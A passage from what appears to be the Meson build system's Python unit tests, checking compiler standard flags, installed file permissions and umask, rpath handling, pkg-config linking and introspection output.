def _test_stds_impl(self, testdir, compiler, p: str):
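# Compilers other than clang/gcc are assumed to accept every listed std; for
# clang and gcc, gate the newer standards on the version checks below
# (Apple clang uses its own version numbering).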
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# We do it like this to handle gnu++17/c++17 and gnu17/c17 cleanly;
# check the C++ variants first.
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and (compiler.get_id(), v) not in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make it treat unknown -std=... options as errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown fails non-fatally when we are not root, so only check ownership as root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown fails non-fatally when we are not root, so only check ownership as root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown fails non-fatally when we are not root, so only check ownership as root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
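# Pairs of (path relative to the install prefix, expected stat.filemode() string).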
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask in effect when the worktree
was checked out or when the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
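# the_truth maps the basenames of the installed libraries to their full
# install paths; the_truth_2 is the expected set of install_filename
# entries for the 'some' target, which is checked against --targets below.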
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
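# The boolean marks formats that are expected to be rejected: the
# --just-symbols variants cannot be used to set an rpath, so init() must
# fail with a CalledProcessError for them (checked below).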
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
break
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
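# The generated cross file maps the tools used by the test project
# (sometool.py / someothertool.py) to a script shipped with the test, so
# find_program() has to resolve them from the [binaries] section.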
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
Check that a library installed as a static archive together with its
pkg-config file can be consumed by a separate project via PKG_CONFIG_PATH.
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On these platforms libintl is a separate library, so it shows up in the link flags
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, so some of the checks below only run on macOS and Linux.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
